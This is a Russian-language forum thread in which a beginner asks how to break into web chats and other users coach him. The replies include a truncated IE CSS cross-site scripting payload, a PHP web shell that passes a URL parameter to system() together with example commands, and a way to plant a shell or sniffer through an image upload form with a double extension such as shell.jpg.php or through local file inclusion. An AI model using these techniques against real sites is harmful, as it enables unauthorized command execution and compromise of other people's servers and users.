Чаты НаучитЕ

ЛюдИ - научите меня взламывать ЧаТы...
Что для этого нужно иметь у ссебя на компе.

В общем ...Я в ВАШИХ руках ...

 

не в компе, а в голове - мозги!
изучить надо
html, css, js, трюки в ie, php / cgi (perl), db

 

2 zFailure
Изучил ... не знаю - что за трюки в ip и db ...
А так ЗНАЮ - давайте УЧИТЕ ... Плиzzz

 

трюки не в ip, а в ie (он же internet explorer)
например: background:url(javascript:....)
вообщем на этом сайте есть статья посвященная этому

db оно же database ну sql короче

 

---Zak--- всё приходит с опытом!!! А вообще больше читай вышеописанного!

 

Куча мозгов не помогут, если нет фантазии
Ну и конечно некоторых знаний...

 

Главное научись понимать HTML ,а остальное придет современем!

 

2 Morph
ну в этом HTML коде согласись мало смысла!
<img src="http://...1234567890"z=`">
` style=`background:url(javascript:...)`

хотя работает!

 

Ты про чо непонял?Я нынче тугой(Шутка)

 

Нет посути ведь чаты ломать HTML знать надо!Может не прав?Хотя думаю прав

 

2 Morph
прав на половину, точнее на одну треть!
ну бедешь ты знать HTML, ну разбудят тебя в 3 часа ночи и ты сможешь наизусь рассказать спецификацию XHTML 1.0, но чат то ты все равно не сможешь взломать!

 

В общем НАРОД... HTML я знаю как свои 5-ть пальцев ... САМ сайты создаю ...

Трюки типа ЭтогО я поже делать умею и воображение у меня есть  

НЕ могли бы вы на конкретном ПРИМЕРе ... показать -объястнить - разъястнить ... ?

 

2 Zak
ну если так, то тебе осталось посмотреть пару видео о вломе чатов и прочитать пару статей про чаты и IE

 

2 zFailure
ОкИ ... будем смотреть ...

 

ТАК ... прочитал почти ВсЕ, что у ВАС тут есть ...
Не помогает или до меня не доходит.
В общем предложите мне на каком-нибудь ЧаТе потренироваться ... только без подстав  

 

А могу ли я сам себя взломать, т.е. у меня установленно Apache ...
Нампример - установить у себя 2 хоста:
На один из них закачать с какого-нибудь сайта скрипт ЧаТа (chat.ru)
А на другом например будут все мои скрипты ? (narod.ru)

ВОТ я так попробовал, но только у меня не установленна mySQL...
И при попытке из php вызвать скрипт:
<?
if (!empty($_GET['c'])) {
echo '<pre>';
system($_GET['c']);
echo '</pre>';
exit;
}
?>
то в окне у меня становиться "слишком" чисто - ничего на нем нет - пусто.
Прописываю .php?c=|c -| все равно пусто ... хотя же должно появиться содержимое папки.
Хотя remview.php работает ...

Просто у меня возник вопрос - можно самого себя ?
И еще можно не делать копии на сервере, а закачивать к себе на сервер ?

2 zFailure
Можно еще где-нибудь на сайте написать функции, которые ВЫ пишите в адресе после ".php?" с объяснениями.

 

не во первых не .php?c=|c -|
а .php?c=lc -l (L - маленькая)

во вторых сомневаюсь что у тебя стоит UNIX система
тогда .php?c=dir

это не функции а команды
открой любой справочник по UNIX, ты найдешь их там
а если есть UNIX то заглени в папку /bin
они все лежат там

 

Можно ломануть через url ... но тут у меня вопрос можно ли ломануть через "обзор", т.е. на сайте предлагается закачать картинку со своего компа.
Вопрос: Можно закачать снифер с себе на диск и после этого залить его на сервер ?

 

если скрипт ничего не скажет на расширение php то можно!
иногда програмери делают тупую проверку
типа такого
if (strpos('.jpg',s)) {
...

тогда прокатит такая фича
shell.jpg.php

если на сайте есть местная php иньекция, то и расширение можно оставить .jpg, а потом просто подключить!

 

zFailure

Что за инъекция, напиши!
))